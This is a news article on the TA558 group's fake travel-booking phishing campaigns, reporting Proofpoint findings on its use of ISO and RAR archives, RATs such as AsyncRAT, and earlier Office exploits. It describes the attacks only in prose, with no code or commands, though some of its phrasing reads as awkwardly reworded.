Beware of Cybercriminals: The Rising Threat of Fake Travel Reservation Links

Bogus travel bookings are adding to the woes of the travel-fatigued, who are already grappling with the distress of flight cancellations and jam-packed hotels.

A well-known cyber threat group known as TA558 has intensified its activities, particularly focusing on the travel and hospitality sectors. Following a period of reduced activities, likely due to the travel limitations imposed by the COVID pandemic, the threat group has escalated its operations to take advantage of the increased travel and corresponding rise in airline and hotel reservations.

Security experts have cautioned that cybercriminal group TA558 has re-engineered their 2018 tactics, now using counterfeit booking emails containing links. These links, when clicked, release a harmful malware payload composed of a mix of different malware types.

The latest campaign stands out due to its use of RAR and ISO file attachments in messages, as indicated by a Proofpoint report. These are compressed file formats that, when activated, unpack the file and folder information contained within.

In 2022, TA558 started to employ URLs more often. The number of campaigns orchestrated by TA558 involving URLs in 2022 was 27, a significant jump from merely five campaigns in total from the period 2018 to 2021. Usually, these URLs would direct to container files like ISOs or zipped [RAR] files that held executables, as reported by Proofpoint.

For the infection to take place, the intended target must be deceived into unpacking the file archive. “The booking link… directed to an ISO file along with an integrated batch file. The running of the BAT file instigated a PowerShell aid script that fetched a subsequent payload, AsyncRAT,” the investigators reported.

Boost Your Journey to Malware Infection Recognition

Previous TA558 operations, monitored by Palo Alto Networks (in 2018), Cisco Talos (in 2020 and 2021) and Uptycs (in 2020), have utilized harmful Microsoft Word document attachments (CVE-2017-11882) or distant template URLs to download and set up malware, as reported by Proofpoint.

The move towards ISO and RAR files is probably a response to Microsoft’s declarations at the end of 2021 and the beginning of 2022, about turning off macros [VBA and XL4] in Office tools as a default setting, according to experts.

The pace of campaigns saw a considerable rise in 2022. These campaigns introduced a cocktail of malicious software including Loda, Revenge RAT, and AsyncRAT. The perpetrator employed an array of dissemination methods such as URLs, RAR and ISO attachments, along with Office documents, as noted by the researchers.

The latest malware attacks often carry harmful payloads, such as remote access trojans (RATs), according to Proofpoint. These RATs can allow spying, data pilfering, and delivery of additional harmful payloads.

Regardless of their transformations, the group’s objective has consistently stayed the same. The researchers determined “with moderate to strong assurance” that TA558 is driven by financial gains, leveraging pilfered data to expand and embezzle funds. “Potential breaches could pose a risk to both travel companies and their customers who have utilized their services for holidaying,” stated Sherrod DeGrippo, the VP of threat investigation and identification at Proofpoint, in a commentary. “Entities in these and associated sectors should stay vigilant about this perpetrator’s actions and implement measures to safeguard themselves.”

The Story of TA558

TA558 has had its major focus on companies within the travel, hospitality, and associated sectors from 2018 onwards. These companies are usually based in Latin America, but occasionally they can also be found in North America or Western Europe.

Historically, TA558 has relied on cleverly crafted emails to entice unsuspecting individuals into opening harmful links or files. These emails, primarily composed in Portuguese or Spanish, typically presented information related to hotel bookings. The subject or the title of the attached file was frequently nothing more than “reserva.”

During their initial adventures, the team exploited weaknesses in Microsoft Word’s Equation Editor, like the CVE-2017-11882, which is a remote code execution flaw. Their main objective was to install a Remote Access Trojan, typically Loda or Revenge RAT, onto the victim’s computer.

The team broadened their toolkit in 2019, employing harmful macros embedded in Powerpoint files and template injections aimed at Office documents. They also started targeting a new audience, making use of English-language phishing bait for the first time.

TA558 saw its peak activity in the initial part of 2020, launching a whopping 25 harmful campaigns in just the first month. Their modus operandi mainly involved the use of Office documents teeming with macros, or exploiting recognized Office weak points.

Institutions, particularly those functioning in the focused sectors of Latin America, North America, and Western Europe, should stay vigilant about this player’s strategies, methodologies, and processes, as suggested by experts.

Site Footer